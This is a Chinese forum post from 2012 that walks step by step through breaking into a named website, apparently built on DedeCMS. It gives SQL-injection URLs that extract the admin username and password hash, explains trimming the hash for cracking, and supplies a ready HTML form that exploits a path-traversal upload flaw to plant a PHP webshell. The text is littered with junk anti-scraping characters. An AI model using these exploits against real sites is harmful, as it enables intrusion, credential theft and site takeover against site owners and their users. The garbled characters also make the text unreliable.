①注入漏洞。8 M& T" Z5 d0 `2 V. H
这站 http://www.political-security.com/& [8 B$ p2 z) y
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
: W& F0 h. Z* o( p# Q) R; D2 ~www.political-security.com/data/mysql_error_trace.inc 爆后台1 p" ~2 y; N" z3 u4 A( P6 l6 H
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
, p- M* X6 E( e& X Z7 Q然后写上语句
/ S: v4 q4 b5 v g查看管理员帐号
9 ?: |- @7 {! N+ q0 [+ D% khttp://www.political-security.co ... &membergroup=@`
- G7 N1 x: A+ D# e- C/ |3 `
1 `) q% [4 l+ o% H1 f, ?4 l+ ?admin
9 p* g' h: |% u" U: v* ? u6 T/ G
S3 o& O* y4 J# t3 D) u查看管理员密码! q- @7 r: ?: |2 f# h! j9 c
http://www.political-security.co ... &membergroup=@`3 B+ \1 `& F- g& S+ X) l
( \) t% e! s- m8d29b1ef9f8c5a5af429
7 f# r; ~) w) W# {
; [1 z' H+ U/ `: L. `) T# b查看管理员密码) Z7 W! x' N3 W2 L1 s- y
/ `0 ?" k) k# y5 V P! s得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; ^8 \' i; u3 x8 R6 T( T$ M1 b$ R& z1 O
8d2
* W* ^: g) C: K: m4 C- X) A9b1ef9f8c5a5af42
9 i0 h- h* x" I) ? i; L9
/ @# t2 z' R- C& G5 O$ y% q$ r6 H& A$ T% N( i; d; P
cmd5没解出来 只好测试第二个方法* O4 o( V, h+ v" H% h* A! ~0 @
3 _: Y" W2 n( E$ m# _0 W. ]& A6 s: K
1 D4 u! I/ b, Z) W& G5 D' `$ g②上传漏洞:- h- h* @4 }! A9 T5 Y
l; h) P/ r, x2 R只要登陆会员中心,然后访问页面链接8 s7 f* L) ^5 C6 _0 ?3 r2 c
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”( [6 A; ~3 `2 A f0 y- j
, j: _+ ^. u L% c! D9 ~; R' P4 A* A
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”# v" I9 c# c( h3 j* T+ {
- U) S. b* v8 b/ U; ?% I于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
$ N/ b9 J, W/ q* K" V& H" l6 G9 } f
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
& v* w& [& ]5 h或者9 `! f7 i2 l& u+ e3 ~( n+ x/ X8 H
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对